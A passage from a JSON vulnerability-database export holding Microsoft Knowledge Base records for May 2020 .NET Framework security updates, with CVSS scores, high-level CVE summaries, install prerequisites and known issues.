"2020-05-12T00:00:00", "type": "mskb", "title": "May 12, 2020-KB4552927 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T17:00:23", "id": "KB4552927", "href": "https://support.microsoft.com/en-us/help/4552927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:35", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. 
An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations>)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552982](<https://support.microsoft.com/help/4552982>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552982) \n * [4552946](<https://support.microsoft.com/help/4552946>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552946) \n * [4552923](<https://support.microsoft.com/help/4552923>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552923) \n * [4552933](<https://support.microsoft.com/help/4552933>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4552933) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and 
Windows Server 2012 R2 (KB4556401)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556401", "href": "https://support.microsoft.com/en-us/help/4556401", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:40:59", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 3.5 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. 
The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552931>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552931.csv>). 
\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552931 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4552931", "href": "https://support.microsoft.com/en-us/help/4552931", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:04", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 
4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. 
To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552963](<https://support.microsoft.com/help/4552963>) Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4552963) \n * [4552968](<https://support.microsoft.com/help/4552968>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4552968) \n * [4552958](<https://support.microsoft.com/help/4552958>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4552958) \n * [4552961](<https://support.microsoft.com/help/4552961>) Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4552961) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft 
Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4556404)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556404", "href": "https://support.microsoft.com/en-us/help/4556404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:32", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section before installing this update. 
\n\n**IMPORTANT **Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on the affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU/t_blank>) post. \n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets. \n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/en-us/help/4522133/procedure-to-continue-receiving-security-updates>) to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>). \n\n**IMPORTANT** Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1: **Note **The notification will not appear on domain-joined machines or machines in kiosk mode. \n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. 
For more information, see [How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/archived-how-to-get-extended-security-updates-for-eligible/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 R2 SP1, and Windows 7 SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>). \n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>). \n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>). \n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects. 
To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. 
The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file. \n---|--- \n**Workaround**| For details see the article for the .NET Framework individual product version for detailed instructions. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552940](<https://support.microsoft.com/help/4552940>) Description of the Security and Quality Rollup for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552940) \n * [4552920](<https://support.microsoft.com/help/4552920>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552920) \n * [4552919](<https://support.microsoft.com/help/4552919>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552919) \n * [4552921](<https://support.microsoft.com/help/4552921>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552921) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how 
we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4556399)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1066", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556399", "href": "https://support.microsoft.com/en-us/help/4556399", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:05", "description": "None\n## Notice\n\n**Revised 6/8/2021** On June 8th, 2021, this update was released to replace a previous update to address a \u201crevocation server was offline\u201d error that may occur during installation. If you've already installed a previous release of this update, no action is required. 
To obtain the latest version of these updates, see the \"How to obtain and install the update\" section of the individual update article. Links to each article are found in the \"Additional information about this update\" section of this article. On April 13th, 2021, this update was released to replace a previous release of this update. On July 23, 2020, update KB4552952 v2 and KB4552951 v2 were released to replace v1 of those updates for .NET Framework 4.5.2 and 4.6 for Windows Server 2008 SP2. The v1 updates did not install for customers who had certain ESU configurations. The v2 updates correct the issue for customers who could not install the v1 updates. \n\n**Applies to:** Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6\n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update.\n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets.\n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in KB4522133 to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://docs.microsoft.com/{lang-locale}/lifecycle/faq/extended-security-updates>).\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2 require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. 
For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.\n * The revocation function was unable to check revocation because the revocation server was offline. 
\n---|--- \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update. If you've already installed a previous release of the affected parts, no action is required. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552964](<https://support.microsoft.com/help/4552964>) Description of the Security Only Update for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4552964)\n * [4552952](<https://support.microsoft.com/help/4552952>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552952)\n * [4552951](<https://support.microsoft.com/help/4552951>) Description of the Security Only Update for .NET Framework 4.6 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552951)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4556406)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556406", "href": "https://support.microsoft.com/en-us/help/4556406", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:37", "description": "None\n**Applies to:** Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 \n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets. \n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in KB4522133 to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://docs.microsoft.com/{lang-locale}/lifecycle/faq/extended-security-updates>). \n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2 require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. 
